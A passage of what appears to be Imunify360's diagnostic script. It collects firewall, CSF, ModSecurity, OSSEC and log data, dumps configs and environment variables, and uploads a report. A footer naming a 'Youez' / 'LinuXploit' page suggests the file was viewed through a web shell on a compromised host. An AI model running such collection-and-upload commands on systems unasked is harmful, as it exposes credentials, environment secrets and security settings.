run &quot;service firewalld status&quot;
run &quot;service ossec-hids status&quot;
run &quot;service fail2ban status&quot;
run &quot;service httpd status&quot;
run &quot;service lshttpd status&quot;
run &quot;service patchman-client status&quot;

run_cb &quot;webshield_selfcheck&quot;

run_cb &quot;pam_db_size&quot;
run &quot;imunify360-pam status --yaml&quot;
run &quot;ls -la /etc/pam.d/&quot;
run &quot;cat /etc/pam_imunify/i360.ini&quot;

if [ -e &quot;/usr/sbin/csf&quot; ]; then
  run &quot;csf --status&quot;
  run &quot;lfd --status ; echo $?&quot;
  run &quot;service lfd status&quot;
  run &quot;service csf status&quot;
  run &quot;csf -V&quot;
  dump &quot;/etc/csf/csf.conf&quot;
  dump &quot;/etc/csf/csf.deny&quot;
  dump &quot;/etc/csf/csf.allow&quot;
  dump &quot;/etc/csf/csf.ignore&quot;
  run &quot;tail -n3000 /var/log/lfd.log&quot;
fi
run &quot;cxs --version&quot;

if [ -e &quot;/usr/bin/firewall-cmd&quot; ]; then
    run &quot;timeout 5 firewall-cmd -V&quot;
    run &quot;timeout 5 firewall-cmd --state&quot;
    run &quot;tail -n3000 /var/log/firewalld&quot;
fi

run &quot;service cpanel status&quot;
dump &quot;/var/cpanel/dnsonly&quot;
run &quot;service mysql status&quot;
run &quot;ps aux | grep -i cphulk&quot;

run &quot;ipset -V&quot;
run &quot;ipset save | head -n3000&quot;
run &quot;ipset list -t | head -n3000&quot;
run &quot;iptables -V&quot;
run &quot;iptables-save | head -n3000&quot;

run &quot;ifconfig&quot;
run &quot;echo .tables | $db_command&quot;
run &quot;echo \&quot;select plugin, count(*) from incident;\&quot; | $db_command_resident&quot;
run &quot;echo \&quot;select listname, count(*) from iplist;\&quot; | $db_command_resident&quot;
run &quot;echo \&quot;select iplist_id, count(*) from iplistrecord;\&quot; | $db_command_iplist&quot;
run &quot;echo \&quot;select * from iplist order by ctime desc limit 1000;\&quot; | $db_command_resident&quot;
run &quot;echo \&quot;select * from incident order by timestamp desc limit 1000;\&quot; | $db_command_resident&quot;
run &quot;echo \&quot;select * from country limit 1000;\&quot; | $db_command&quot;
run &quot;echo \&quot;select * from country_list order by ctime desc limit 1000;\&quot; | $db_command&quot;
run &quot;echo \&quot;select * from last_synclist limit 1000;\&quot; | $db_command_resident&quot;
run &quot;echo \&quot;select * from migratehistory limit 1000;\&quot; | $db_command&quot;
run &quot;echo \&quot;select * from malware_hits limit 1000;\&quot; | $db_command&quot;
run &quot;echo \&quot;select * from malware_ignore_path limit 1000;\&quot; | $db_command&quot;
run &quot;echo \&quot;select * from malware_scans limit 1000;\&quot; | $db_command&quot;
run &quot;du --human-readable /var/imunify360/imunify360.db&quot;
run &quot;imunify360-agent blacklist country list --json --limit 2000&quot;
run &quot;imunify360-agent blacklist ip list --json --limit 2000&quot;
run &quot;imunify360-agent graylist ip list --json --limit 2000&quot;
run &quot;imunify360-agent whitelist country list --json --limit 2000&quot;
run &quot;imunify360-agent whitelist ip list --json --limit 2000&quot;

run &quot;imunify360-agent rstatus&quot;
run &quot;imunify360-agent version&quot;
run &quot;imunify360-agent 3rdparty conflicts --json | /opt/imunify360/venv/bin/python -m json.tool&quot;
run &quot;imunify360-agent config show --json -v&quot;
run &quot;grep License /var/log/imunify360/console.log | tail -n 1000&quot;
run &quot;grep &#039;Server is offline&#039; /var/log/imunify360/console.log | tail -n 1000&quot;
run &quot;grep &#039;SensorAlert&#039; /var/log/imunify360/console.log | tail -n 3000&quot;
run &quot;grep &#039;modsec&#039; /var/log/imunify360/console.log | tail -n 3000&quot;
run &quot;ls -la /etc/sysconfig/imunify360/&quot;
run_cb &quot;backup_systems_info&quot;

run &quot;tail -n3000 /var/log/i360deploy.log&quot;
run &quot;tail -n3000 /var/log/imav-deploy.log&quot;
run &quot;tail -n3000 /var/ossec/logs/active-responses.log&quot;
run &quot;tail -n3000 /var/ossec/logs/alerts/alerts.log&quot;
run &quot;tail -n3000 /var/log/yum.log&quot;
run &quot;tail -n3000 /var/log/minidaemon.log&quot;

# cPanel
run &quot;tail -3000 /usr/local/apache/logs/error_log&quot;
run &quot;tail -3000 /usr/local/apache/logs/access_log&quot;
run &quot;tail -3000 /usr/local/apache/logs/modsec_audit.log&quot;
# EA4
run &quot;tail -3000 /etc/apache2/logs/modsec_audit.log&quot;
# plesk
run &quot;tail -3000 /usr/local/apache/logs/modsec_audit.log&quot;
# DA
run &quot;tail -3000 /var/log/httpd/modsec_audit.log&quot;

run &quot;tail -3000 /var/log/trueimage-setup.log&quot;

run &quot;/usr/local/cpanel/scripts/modsec_vendor list&quot;
run &quot;whmapi1 modsec_get_configs&quot;
run &quot;whmapi1 modsec_get_settings&quot;
run &quot;cat /etc/apache2/conf.d/modsec2.imunify.conf&quot;
run &quot;cat /usr/local/apache/conf/includes/modsec2.imunify.conf&quot;
run &quot;ls /var/cpanel/cwaf&quot;

# prepend each particular log with ==&gt; logfilename &lt;== string
run &quot;tail --lines +0 /var/log/imunify360/register_unregister_post_error_*.log&quot;

# prepend each particular log with ==&gt; logfilename &lt;== string
run &quot;tail --lines +0 /var/log/imunify360/*hardenedphp.log.*&quot;
run &quot;tail --lines +0 /var/log/imunify360/*kernelcare.log*&quot;
run &quot;tail --lines +0 /var/log/imunify360/*ea_php.log*&quot;
run &quot;ls /opt/alt/php*/usr/bin/php&quot;
run &quot;ls /opt/cpanel/ea-php*/root/usr/bin/php&quot;
run &#039;rpm -qa --queryformat &quot;%{NAME} %{RELEASE}\n&quot; &quot;ea-php*&quot;&#039;

run &quot;getenforce&quot;
run &quot;sestatus&quot;
run &quot;ss -u -a&quot;
run &quot;ss -x -a | grep defence360agent&quot;
run &quot;nc -v -w 5 -i 1 imunify360.cloudlinux.com 443&quot;
run &quot;nc -v -w 5 -i 1 148.251.142.83 443&quot;
dump &quot;/usr/local/cpanel/version&quot;
run &quot;ls /etc/rc.d/init.d/&quot;
run &quot;systemctl list-units --all&quot;
run &quot;systemctl status aibolit-resident.socket&quot;
run &quot;curl ipinfo.io&quot;
run &quot;netstat -tulpan | tail -n 3000&quot;
run &quot;netstat -tulpan | wc -l&quot;
# only tcp listening sockets &amp; program
run &quot;netstat -tlpn&quot;
run &quot;lsmod | grep ip_set&quot;
dump &quot;/etc/cagefs/cagefs.mp&quot;
for f in /var/log/imunify360/native_da.hook_log.*
do dump $f
done

### PLESK
run &quot;/usr/local/psa/admin/sbin/modsecurity_ctl --list-rules&quot;
run &quot;/usr/local/psa/admin/sbin/modsecurity_ctl --list-rules --enabled&quot;
run &quot;/usr/local/psa/admin/sbin/modsecurity_ctl --status&quot;
run &quot;/usr/local/psa/bin/server_pref --show-web-app-firewall&quot;

run_cb &quot;http_server_info&quot;
# collect info on how huge /var/cpanel/secdatadir/ip.pag is
run &quot;ls -lh /var/cpanel/secdatadir/*&quot;
run &quot;printenv&quot;

run &quot;/usr/libexec/run-with-intensity show&quot;

# colect webshield  info
run &quot;tail -3000 /var/log/wsshdict/wsshdict.log&quot;
run &quot;tail -3000 /var/log/imunify360/imunify360-wafd.log&quot;

# collect UAL log
run &quot;tail -3000 /var/log/imunify360/imunify360-unified-access-logger/log.rotate&quot;

if [ -e &quot;/etc/kdump.conf&quot; ]; then
  KDUMP_PATH=`grep ^path /etc/kdump.conf|cut -d&#039; &#039; -f2`
  if [ -z &quot;$KDUMP_PATH&quot; ] ; then
    run &quot;ls -lR /var/crash&quot;
  else
    run &quot;ls -lR $KDUMP_PATH&quot;
  fi
fi
run dmesg

run &quot;ls -la /var/ossec/etc/VERSIONS/&quot;
run &quot;ls --lcontext /var/ossec&quot;
run &quot;ls --lcontext /var/ossec/bin&quot;
run &quot;ls --lcontext /var/ossec/logs&quot;

run &quot;ls -la /etc/httpd/conf/modsecurity.d/rules/&quot;
run &quot;ls -la /etc/apache2/conf.d/modsec_vendor_configs/&quot;

run &quot;cat /etc/httpd/conf/modsecurity.d/rules/custom/VERSION&quot;
run &quot;cat /usr/local/directadmin/custombuild/custom/modsecurity/conf/VERSION&quot;
run &quot;cat /etc/apache2/conf.d/modsec_vendor_configs/imunify*/VERSION;echo&quot;
run &quot;cat /var/cpanel/modsec_cpanel_conf_datastore&quot;

run &quot;cut -d\&quot;:\&quot; -f1 /etc/userplans | sort -n | uniq | wc -l&quot;
run &quot;cut -d\&quot;:\&quot; -f1 /etc/userplans | sort -n | uniq&quot;
run &quot;cut -d\&quot;:\&quot; -f2 /etc/virtual/domainowners | sort -n | uniq&quot;
run &quot;cut -d\&quot;:\&quot; -f2 /etc/virtual/domainowners | sort -n | uniq | wc -l&quot;
run &quot;plesk db \&quot;SELECT COUNT(DISTINCT cl_id) FROM domains\&quot;&quot;
run &quot;httpd  -t&quot;

run &quot;journalctl --no-pager -u imunify360 --since -1d&quot;
run &quot;journalctl --no-pager -u imunify360-agent --since -1d&quot;
run &quot;journalctl --no-pager -u imunify360-unified-access-logger --since -1d&quot;

upload &amp;&amp; echo || report_error_and_exit &quot;Report file upload failed. Please try again.&quot;
</pre><center><br>Youez - 2016 - github.com/yon3zu<br><a href='https://linuxploit.com/' target='_blank'>LinuXploit</a></center>